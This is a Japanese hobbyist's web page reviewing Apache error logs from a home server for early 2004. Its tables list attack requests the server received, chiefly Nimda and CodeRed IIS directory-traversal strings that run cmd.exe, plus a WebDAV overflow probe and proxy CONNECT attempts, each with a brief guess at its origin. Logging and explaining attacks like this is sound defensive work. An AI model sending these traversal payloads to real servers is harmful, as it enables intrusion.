楽しみながら攻めつづける！　「山下の部屋」Apacheのログウォッチ　2004年1月15日～2004年2月29日

楽しみながら攻めつづける！
－HONDA '88NSR250R & '94NSR250R SE－

　
山下の部屋　自宅サーバのログを見てみよう

Apacheのログウォッチ　2004年1月15日～2004年2月29日
　
　自宅Webサーバのログ集計です。今回は1月中旬～2月末の1.5ヶ月分です。
しかし、毎月・毎月新手？の不正アクセスログが残ってますね～。
/NULL.IDAも亜種？なのか少し改良されたのか、Queryが変更されたログが残ってましたし、後はWebDAV関係のログが増えてきているようです・・・今後も増えてくるのかな？
　
　irc.tokyo.wide.ad.jp:6667:　のログもちょっと意味不明？チャット関連っぽいですけど・・・何だろう？
　
400：Bad Request

Method	URL	Query	回数	理由
GET	/NULL.IDA	CCC～（略）～\xffVcmd.exe$	17	WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET	/NULL.IDA	CCC～（略）～\xf45;cmd.exe$	17	WINNTAutoAttack V2.5というアタックツールからの攻撃らしい？
GET	/scripts/..%%35%63../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%%35c./winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
CONNECT	irc.tokyo.wide.ad.jp:6667:	-	2	IRC？チャットかな？？？

　
404：Not Found

Method	URL	Query	回数	理由
GET	/column/ディレクトリなど	-	83	コラムはネタが無いので、サーバ上から削除したんですよ（汗）
GET	/link/link.html関連	-	51	MC16/18/21/28のリンク集に分けて削除したんですよね（汗）
GET	/_vti_bin/owssvr.dll	UL=1&～（略）～&CAPREQ=0	49	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/MSOffice/cltreq.asp	UL=1&～（略）～&CAPREQ=0	49	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/default.ida	XXXX～（途中略）～%u00=a	22	「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/root.exe	/c+dir	19	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/MSADC/root.exe	/c+dir	17	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/c/winnt/system32/cmd.exe	/c+dir	16	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/d/winnt/system32/cmd.exe	/c+dir	16	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%255c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%25%35%63../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%252f../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%2f../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%af../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%1c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%9c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/nsiislog.dll	-	11	Windows Mediaサービスに対する ISAPI 拡張欠陥による IIS サービス拒否攻撃
POST	/_vti_bin/shtml.exe/_vti_rpc	-	3	WebDAV＋Office XPで「Webフォルダとして開く」にチェックがしてあり、自宅サーバにMS-Author-ViaというヘッダーがないのでFrontPage Server Extensionだと勘違いして要求してくるらしい。
GET	/_vti_inf.html	-	3	WebDAV＋Office XPで「Webフォルダとして開く」にチェックがしてあり、自宅サーバにMS-Author-ViaというヘッダーがないのでFrontPage Server Extensionだと勘違いして要求してくるらしい。
GET	/scripts/..%255c%255c../winnt/system32/cmd.exe	/c+dir	1	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi	-	1	？

　
405：Method Not Allowed

Method	URL	Query	回数	理由
CONNECT	1.3.3.7:1337	-	4	1337番ポート？新手の広域スキャンかな？？
CONNECT	207.46.133.140:21	-	1	21番ポートなので、他のFTPサーバに接続しようとしてるのかな？
POST	/	-	1	POST？
POST	http://63.190.169.132:25/	-	1	POST？
POST	mx1.mail.yahoo.com:25	-	1	POST？

　
414: Request URI Too Long

Method	URL	Query	回数	理由
SEARCH	/\x90～（略）～\x90	-	4	WebDAV の脆弱性を狙った攻撃らしい

　
501：Not Implemented

Method	URL	Query	回数	理由
SEARCH	/	-	1	？
y	/	-	1	？
\x04\x01	/	-	1	AN HTTPDのセキュリティホールをつく攻撃みたい

楽天ブックス【コミック1冊でもファミマ受取で送料無料！】